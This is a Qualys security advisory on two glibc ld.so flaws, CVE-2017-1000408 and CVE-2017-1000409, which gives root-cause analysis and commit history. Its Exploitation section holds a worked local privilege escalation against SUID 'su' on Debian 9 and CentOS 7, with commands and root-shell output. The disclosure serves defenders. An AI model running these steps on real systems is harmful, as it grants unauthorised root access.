GNU C Library Dynamic Loader glibc ld.so – Memory Leak / Buffer Overflow

  • 作者: Qualys Corporation
    日期: 2017-12-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43331/
  • Qualys Security Advisory
    
    Buffer overflow in glibc's ld.so
    
    
    ========================================================================
    Contents
    ========================================================================
    
    Summary
    Memory Leak
    Buffer Overflow
    Exploitation
    Acknowledgments
    
    
    ========================================================================
    Summary
    ========================================================================
    
    We have discovered a memory leak and a buffer overflow in the dynamic
    loader (ld.so) of the GNU C Library (glibc):
    
    - the memory leak (CVE-2017-1000408) first appeared in glibc 2.1.1
    (released on May 24, 1999) and can be reached and amplified through
    the LD_HWCAP_MASK environment variable;
    
    - the buffer overflow (CVE-2017-1000409) first appeared in glibc 2.5
    (released on September 29, 2006) and can be triggered through the
    LD_LIBRARY_PATH environment variable.
    
    Further investigation showed that:
    
    - the buffer overflow is not exploitable if
    /proc/sys/fs/protected_hardlinks is enabled (it is not enabled by
    default on vanilla Linux kernels, but most Linux distributions turn it
    on by default);
    
    - the memory leak and the buffer overflow are not exploitable if the
    glibc is patched against CVE-2017-1000366, because this patch ignores
    the LD_HWCAP_MASK and LD_LIBRARY_PATH environment variables when SUID
    binaries are executed (CVE-2017-1000366 was first patched in glibc
    2.26, released on August 2, 2017, but most Linux distributions had
    already backported this patch on June 19, 2017).
    
    We have therefore rated the impact of these vulnerabilities as Low.
    Nevertheless, we give a brief analysis of the vulnerable function, and
    present a simple method for exploiting a SUID binary on the command line
    and obtaining full root privileges (if /proc/sys/fs/protected_hardlinks
    is not enabled, and CVE-2017-1000366 is not patched).
    
    
    ========================================================================
    Memory Leak (CVE-2017-1000408)
    ========================================================================
    
    ------------------------------------------------------------------------
    Analysis
    ------------------------------------------------------------------------
    
    In _dl_init_paths(), ld.so malloc()ates "rtld_search_dirs.dirs[0]", a
    cache of information about the system's trusted directories (typically
    "/lib" and "/usr/lib" on 32-bit or "/lib64" and "/usr/lib64" on 64-bit).
    To compute the number of system directories, ld.so uses the classic C
    idiom "sizeof (system_dirs) / sizeof (system_dirs[0])":
    
     691 rtld_search_dirs.dirs[0] = (struct r_search_path_elem *)
     692 malloc ((sizeof (system_dirs) / sizeof (system_dirs[0]))
     693 * round_size * sizeof (struct r_search_path_elem));
    
    Unfortunately, "system_dirs" is not a classic array: it is not an array
    of strings (pointers to characters), but rather an array of characters,
    the concatenation of all system directories, separated by null bytes:
    
     109 static const char system_dirs[] = SYSTEM_DIRS;
    
    where "SYSTEM_DIRS" is generated by "gen-trusted-dirs.awk" (typically
    "/lib/\0/usr/lib/" on 32-bit or "/lib64/\0/usr/lib64/" on 64-bit). As a
    result, the number of system directories is overestimated, and too much
    memory is allocated for "rtld_search_dirs.dirs[0]": if "system_dirs" is
    "/lib/\0/usr/lib/" for example, the number of system directories is 2,
    but 16 is used instead (the number of characters in "system_dirs") to
    compute the size of "rtld_search_dirs.dirs[0]".
    
    This extra memory is never accessed, never freed, and mostly filled with
    null bytes, because only the information about "nsystem_dirs_len" system
    directories (the correct number of system directories) is written to
    "rtld_search_dirs.dirs[0]", and because the minimal malloc()
    implementation in ld.so calls mmap(), but never munmap().
    
    Moreover, this memory leak can be amplified through the LD_HWCAP_MASK
    environment variable, because ld.so uses "ncapstr" (the total number of
    hardware-capability combinations) to compute the size of
    "rtld_search_dirs.dirs[0]":
    
     687 round_size = ((2 * sizeof (struct r_search_path_elem) - 1
     688+ ncapstr * sizeof (enum r_dir_status))
     689 / sizeof (struct r_search_path_elem));
    
    ------------------------------------------------------------------------
    History
    ------------------------------------------------------------------------
    
    We tracked down this vulnerability to:
    
    commit ab7eb292307152e706948a7b19164ff5e6d593d4
    Date: Mon May 3 21:59:35 1999 +0000
    
    Update.
    
    * elf/Makefile (trusted-dirs.st): Use gen-trusted-dirs.awk.
    * elf/gen-trusted-dirs.awk: New file.
    * elf/dl-load.c (systems_dirs): Moved into file scope.Initialize
    from SYSTEM_DIRS macro.
    (system_dirs_len): New variable.Contains lengths of system_dirs
    strings.
    (fillin_rpath): Rewrite for systems_dirs being a simple string.
    Improve string comparisons.Change parameter trusted to be a flag.
    Change all callers.
    (_dt_init_paths): Improve using new format for system_dirs.
    
    which transformed "system_dirs" from an array of strings (pointers to
    characters) into an array of characters:
    
    -static const char *system_dirs[] =
    -{
    -#include "trusted-dirs.h"
    -NULL
    -};
    ...
    +static const char system_dirs[] = SYSTEM_DIRS;
    
    
    ========================================================================
    Buffer Overflow (CVE-2017-1000409)
    ========================================================================
    
    ------------------------------------------------------------------------
    Analysis
    ------------------------------------------------------------------------
    
    In _dl_init_paths(), ld.so computes "nllp", the number of
    colon-separated directories in "llp" (the LD_LIBRARY_PATH environment
    variable), malloc()ates "env_path_list.dirs", an array of "nllp + 1"
    pointers to "r_search_path_elem" structures (one for each directory in
    "llp", plus a terminating NULL pointer), and calls fillin_rpath() to
    fill in "env_path_list.dirs":
    
     777 if (llp != NULL && *llp != '\0')
     778 {
     779 size_t nllp;
     780 const char *cp = llp;
     781 char *llp_tmp;
     ...
     803 nllp = 1;
     804 while (*cp)
     805 {
     806 if (*cp == ':' || *cp == ';')
     807 ++nllp;
     808 ++cp;
     809 }
     810 
     811 env_path_list.dirs = (struct r_search_path_elem **)
     812 malloc ((nllp + 1) * sizeof (struct r_search_path_elem *));
     ...
     819 (void) fillin_rpath (llp_tmp, env_path_list.dirs, ":;",
     820__libc_enable_secure, "LD_LIBRARY_PATH",
     821NULL, l);
    
    Unfortunately, ld.so parses the "llp" string to compute "nllp" but
    parses the "llp_tmp" string (an expanded copy of "llp") to fill in
    "env_path_list.dirs". As a result, the number of pointers written to
    "env_path_list.dirs" can be greater than "nllp + 1" (an mmap()-based
    buffer overflow) if the contents of "llp_tmp" differ from the contents
    of "llp" (if "llp_tmp" contains more colons than "llp"):
    
     784 /* Expand DSTs.*/
     785 size_t cnt = DL_DST_COUNT (llp, 1);
     786 if (__glibc_likely (cnt == 0))
     787 llp_tmp = strdupa (llp);
     788 else
     789 {
     790 /* Determine the length of the substituted string.*/
     791 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);
     792 
     793 /* Allocate the necessary memory.*/
     794 llp_tmp = (char *) alloca (total + 1);
     795 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);
     796 }
    
    The Dynamic String Tokens (DSTs) $LIB and $PLATFORM are expanded to
    fixed strings that do not contain colons (typically "lib" and "i686" on
    32-bit or "lib64" and "x86_64" on 64-bit), but the expansion of $ORIGIN
    (the directory of the binary being executed) can inject extra colons
    into "llp_tmp" and hence extra pointers into "env_path_list.dirs".
    
    To exploit this buffer overflow, a local attacker must therefore be able
    to:
    
    - hard-link a SUID binary into a directory whose pathname contains
    colons (i.e., /proc/sys/fs/protected_hardlinks must not be enabled);
    
    - pass the LD_LIBRARY_PATH environment variable to _dl_init_paths()
    (i.e., CVE-2017-1000366 must not be patched).
    
    ------------------------------------------------------------------------
    History
    ------------------------------------------------------------------------
    
    We tracked down this vulnerability to:
    
    commit 950398e1320255572f4228db94344dcd5f613455
    Date: Tue Aug 29 01:44:27 2006 +0000
    
    * elf/dl-load.c (_dl_init_paths): Expand DSTs.
    
    which added the expansion of llp's Dynamic String Tokens (DSTs) to
    _dl_init_paths():
    
    -char *llp_tmp = strdupa (llp);
    +char *llp_tmp;
    ...
    +/* Expand DSTs.*/
    +size_t cnt = DL_DST_COUNT (llp, 1);
    +if (__builtin_expect (cnt == 0, 1))
    + llp_tmp = strdupa (llp);
    +else
    + {
    + /* Determine the length of the substituted string.*/
    + size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);
    +
    + /* Allocate the necessary memory.*/
    + llp_tmp = (char *) alloca (total + 1);
    + llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);
    + }
    
    
    ========================================================================
    Exploitation
    ========================================================================
    
    ------------------------------------------------------------------------
    Debian 9 (i386)
    ------------------------------------------------------------------------
    
    In this example, we exploit the SUID-root binary "su" on a 32-bit Debian
    9.0: we installed "debian-9.0.0-i386-xfce-CD-1.iso" (the last release
    before glibc's CVE-2017-1000366 was patched), and manually disabled
    protected_hardlinks ("echo 0 > /proc/sys/fs/protected_hardlinks").
    
    1/ First, we identify the system's trusted directories (the only
    directories accepted by fillin_rpath() when executing a SUID binary):
    
    $ env -i LD_PRELOAD=nonexistent LD_HWCAP_MASK=0 LD_DEBUG=libs env 2>&1 | head
    1607: find library=nonexistent [0]; searching
    1607:search cache=/etc/ld.so.cache
    1607:search path=/lib/i386-linux-gnu/tls/i686:/lib/i386-linux-gnu/tls:/lib/i386-linux-gnu/i686:/lib/i386-linux-gnu:/usr/lib/i386-linux-gnu/tls/i686:/usr/lib/i386-linux-gnu/tls:/usr/lib/i386-linux-gnu/i686:/usr/lib/i386-linux-gnu:/lib/tls/i686:/lib/tls:/lib/i686:/lib:/usr/lib/tls/i686:/usr/lib/tls:/usr/lib/i686:/usr/lib(system search path)
    1607: trying file=/lib/i386-linux-gnu/tls/i686/nonexistent
    1607: trying file=/lib/i386-linux-gnu/tls/nonexistent
    1607: trying file=/lib/i386-linux-gnu/i686/nonexistent
    1607: trying file=/lib/i386-linux-gnu/nonexistent
    1607: trying file=/usr/lib/i386-linux-gnu/tls/i686/nonexistent
    1607: trying file=/usr/lib/i386-linux-gnu/tls/nonexistent
    1607: trying file=/usr/lib/i386-linux-gnu/i686/nonexistent
    
    The "system search path" line shows four system directories:
    "/lib/i386-linux-gnu", "/usr/lib/i386-linux-gnu", "/lib", and "/usr/lib"
    ("tls" and "i686" are default hardware capabilities that are enabled
    even if LD_HWCAP_MASK is 0).
    
    2/ Second, we create our $ORIGIN directory and hard-link the SUID-root
    binary "su" into it:
    
    $ mkdir -p '/var/tmp/:/lib:/usr/lib:'
    
    $ cd '/var/tmp/:/lib:/usr/lib:'
    
    $ ln `which su` .
    
    The pathname of our $ORIGIN directory contains two system directories:
    we will write 12 bytes (3 pointers: one for each system directory, plus
    a terminating NULL pointer) to an 8-byte "env_path_list.dirs" ("nllp" is
    only 1, because our unexpanded LD_LIBRARY_PATH does not contain colons).
    In other words, we will overflow "env_path_list.dirs" and write 4 bytes
    (the terminating NULL pointer) out of bounds.
    
    3/ Third, we overwrite this out-of-bounds NULL pointer with the first
    bytes of an error message ("cannot open shared object file") that is
    malloc()ated after "env_path_list.dirs" because of our "nonexistent"
    preload library. Consequently, ld.so crashes when open_path() tries to
    open our second preload library "rootshell.so" in a directory described
    by an "r_search_path_elem" structure located at the unmapped address
    0x6e6e6163 (the overwritten NULL pointer):
    
    $ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
    Segmentation fault
    
    $ dmesg | tail -n 1
    [70632.888695] su[2293]: segfault at 6e6e6173 ip b77e1c43 sp bfc946dc error 4 in ld-2.24.so[b77db000+22000]
    
    The "/../../../../../../../../$LIB" suffix is required, to pass the
    "check_for_trusted" test in _dl_dst_substitute() (our expanded
    LD_LIBRARY_PATH must be rooted in one of the system's trusted
    directories).
    
    4/ Next, we copy the library dependencies of "su" to our current working
    directory, and compile our preload library "rootshell.so" ("la.c" can be
    found at the beginning of our stack-clash exploit "Linux_ldso_hwcap.c"):
    
    $ cp -- `ldd ./su | grep ' => /' | awk '{print $3}'` .
    
    $ cat > la.c << "EOF"
    > static void __attribute__ ((constructor)) _init (void) {
    > ...
    > // setuid(0);
    > ...
    > // execve("/bin/sh");
    > ...
    > }
    > EOF
    $ gcc -fpic -shared -nostdlib -Os -s -o rootshell.so la.c
    
    $ chmod u+s rootshell.so
    
    This "chmod" is required, to pass the SUID-bit test in open_path().
    
    5/ Last, we run "su" with an increasing number of hardware capabilities
    (i.e., with an increasingly large "rtld_search_dirs.dirs[0]"), until the
    "rtld_search_dirs.dirs[0]" occupies the address 0x6e6e6163. Because this
    "rtld_search_dirs.dirs[0]" is mostly filled with null bytes, and because
    an "r_search_path_elem" structure filled with null bytes is equivalent
    to the current working directory in open_path(), ld.so will eventually
    load and execute our "rootshell.so" from the current working directory:
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<16)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
    Segmentation fault
    
    real0m0.715s
    user0m0.120s
    sys 0m0.588s
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<17)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
    Segmentation fault
    
    real0m1.443s
    user0m0.368s
    sys 0m1.072s
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<18)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
    Segmentation fault
    
    real0m2.840s
    user0m0.656s
    sys 0m2.172s
    
    ...
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<23)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
    Segmentation fault
    
    real0m5.778s
    user0m1.200s
    sys 0m4.576s
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<24)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
    Segmentation fault
    
    real0m11.589s
    user0m2.520s
    sys 0m9.060s
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<25)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
    # id; exit
    uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)
    
    real0m28.050s
    user0m6.140s
    sys 0m21.892s
    
    6/ Improvements in the running time of this exploit are left as an
    exercise for the interested reader:
    
    $ env -i LD_LIBRARY_PATH=. LD_PRELOAD=nonexistent LD_HWCAP_MASK="$(((1<<25)-1))" LD_DEBUG=libs env 2>&1 | head -c 1000
    3084: find library=nonexistent [0]; searching
    3084:search path=./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/vme:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/de/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mc
    
    $ mkdir -p './tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu'
    
    $ mv -- *.so* './tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu'
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<25)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
    # id; exit
    uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)
    
    real0m23.485s
    user0m5.244s
    sys 0m18.220s
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='os-release:rootshell.so' LD_HWCAP_MASK="$(((1<<25)-1))" ./su
    ERROR: ld.so: object 'os-release' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.
    # id; exit
    uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)
    
    real0m11.352s
    user0m2.844s
    sys 0m8.388s
    
    ------------------------------------------------------------------------
    CentOS 7 (i386)
    ------------------------------------------------------------------------
    
    In this example, we exploit "su" on a 32-bit CentOS 7.3.1611: we
    installed "CentOS-7-i386-Minimal-1611.iso" (the last release before
    CVE-2017-1000366 was patched), and manually disabled protected_hardlinks
    ("echo 0 > /proc/sys/fs/protected_hardlinks").
    
    $ env -i LD_PRELOAD=nonexistent LD_HWCAP_MASK=0 LD_DEBUG=libs env 2>&1 | head
     17896: find library=nonexistent [0]; searching
     17896:search cache=/etc/ld.so.cache
     17896:search path=/lib/tls/i686:/lib/tls:/lib/i686:/lib:/usr/lib/tls/i686:/usr/lib/tls:/usr/lib/i686:/usr/lib(system search path)
     17896: trying file=/lib/tls/i686/nonexistent
     17896: trying file=/lib/tls/nonexistent
     17896: trying file=/lib/i686/nonexistent
     17896: trying file=/lib/nonexistent
     17896: trying file=/usr/lib/tls/i686/nonexistent
     17896: trying file=/usr/lib/tls/nonexistent
     17896: trying file=/usr/lib/i686/nonexistent
    
    $ mkdir -p '/var/tmp/:/lib:/usr/lib:'
    
    $ cd '/var/tmp/:/lib:/usr/lib:'
    
    $ ln `which su` .
    
    $ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
    Segmentation fault
    
    $ dmesg | tail -n 1
    [ 8414.911000] su[18088]: segfault at 6e6e6173 ip b77645e2 sp bfe0cb40 error 4 in ld-2.17.so[b775f000+1f000]
    
    $ cp -- `ldd ./su | grep ' => /' | awk '{print $3}'` .
    
    $ cat > la.c << "EOF"
    > static void __attribute__ ((constructor)) _init (void) {
    > ...
    > // setuid(0);
    > ...
    > // execve("/bin/sh");
    > ...
    > }
    > EOF
    $ gcc -fpic -shared -nostdlib -Os -s -o rootshell.so la.c
    
    $ chmod u+s rootshell.so
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<16)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
    Segmentation fault
    
    real0m0.527s
    user0m0.085s
    sys 0m0.441s
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<17)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
    Segmentation fault
    
    real0m1.060s
    user0m0.182s
    sys 0m0.877s
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<18)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
    Segmentation fault
    
    real0m2.093s
    user0m0.384s
    sys 0m1.702s
    
    ...
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<25)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
    Segmentation fault
    
    real0m17.071s
    user0m2.525s
    sys 0m14.537s
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<26)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
    Segmentation fault
    
    real0m33.926s
    user0m5.464s
    sys 0m28.429s
    
    $ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<27)-1))" ./su
    ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
    sh-4.2# id; exit
    uid=0(root) gid=0(root) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    
    real1m30.604s
    user0m16.169s
    sys 1m14.395s
    
    
    ========================================================================
    Acknowledgments
    ========================================================================
    
    We thank the members of the linux-distros@openwall list.